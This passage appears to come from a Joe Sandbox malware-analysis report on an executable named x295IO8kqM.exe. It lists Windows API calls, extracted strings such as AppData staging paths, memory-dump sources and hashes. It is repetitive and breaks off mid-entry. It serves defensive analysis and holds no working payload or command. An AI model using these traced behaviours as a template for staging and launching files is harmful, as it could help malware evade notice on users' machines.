                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\AppData\Roaming\woady\roadshow$Execute: $&B
                                                  • API String ID: 2624150263-2138736982
                                                  • Opcode ID: 58ac9057f2f32510fcad5ffab17718fb3b9c543ea4cfa8b876a6dd1a3925d6d9
                                                  • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                  • Opcode Fuzzy Hash: 58ac9057f2f32510fcad5ffab17718fb3b9c543ea4cfa8b876a6dd1a3925d6d9
                                                  • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                  • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040587C
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040589F
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                  • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                  • FindClose.KERNEL32(00000000), ref: 00405964
                                                  Strings
                                                  • \*.*, xrefs: 00405876
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405818
                                                  • "C:\Users\user\Desktop\x295IO8kqM.exe", xrefs: 0040580B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-2364085891
                                                  • Opcode ID: be133582153d891e19e3e2bff4c511fa817ff12c4bb08737e8864b18fcd93172
                                                  • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                  • Opcode Fuzzy Hash: be133582153d891e19e3e2bff4c511fa817ff12c4bb08737e8864b18fcd93172
                                                  • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                  APIs
                                                  • CoCreateInstance.OLE32(004074E4,?,00000001,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\woady\roadshow, xrefs: 00402154
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Roaming\woady\roadshow
                                                  • API String ID: 542301482-699694329
                                                  • Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                  • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                  • Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                  • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                  • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                                  • Opcode Fuzzy Hash: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                  • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404319
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434A
                                                  • GetSysColor.USER32(?), ref: 0040435B
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                  • lstrlenW.KERNEL32(?), ref: 0040437C
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                  • SendMessageW.USER32(00000000), ref: 004043FE
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                  • SetCursor.USER32(00000000), ref: 0040447D
                                                  • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 00404492
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                  • SetCursor.USER32(00000000), ref: 004044A1
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D0
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: Execute: $N$open
                                                  • API String ID: 3615053054-4067340818
                                                  • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                  • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                  • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                  • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                  • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                  • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                  • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,00405EDC,?,?), ref: 00405D58
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EDC,?,?), ref: 00405D7C
                                                  • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                    • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                    • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                  • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                  • wsprintfA.USER32 ref: 00405DC0
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                  • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                    • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405BF3
                                                    • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00405C15
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                  • API String ID: 222337774-899692902
                                                  • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                  • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                  • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                  • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                  • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                  • CharNextW.USER32(?,00000000,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                  • CharPrevW.USER32(?,?,76CF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\x295IO8kqM.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                  • *?|<>/":, xrefs: 00406300
                                                  • "C:\Users\user\Desktop\x295IO8kqM.exe", xrefs: 004062AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-4153272838
                                                  • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                  • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                  • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                  • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                  APIs
                                                  • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                  • GetLastError.KERNEL32 ref: 0040569F
                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                  • GetLastError.KERNEL32 ref: 004056BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                  • API String ID: 3449924974-2404651315
                                                  • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                  • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                  • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                  • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                  • GetSysColor.USER32(00000000), ref: 0040417E
                                                  • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                  • SetBkMode.GDI32(?,?), ref: 00404196
                                                  • GetSysColor.USER32(?), ref: 004041A9
                                                  • SetBkColor.GDI32(?,?), ref: 004041B9
                                                  • DeleteObject.GDI32(?), ref: 004041D3
                                                  • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                  • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                  • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                  • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                  APIs
                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                    • Part of subcall function 00405CD0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CE6
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                  • String ID: 9
                                                  • API String ID: 163830602-2366072709
                                                  • Opcode ID: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                  • Instruction ID: af7b16596185cfa7f969e470bfe402a155c7c568a05af23699f2fbc440ccd5d4
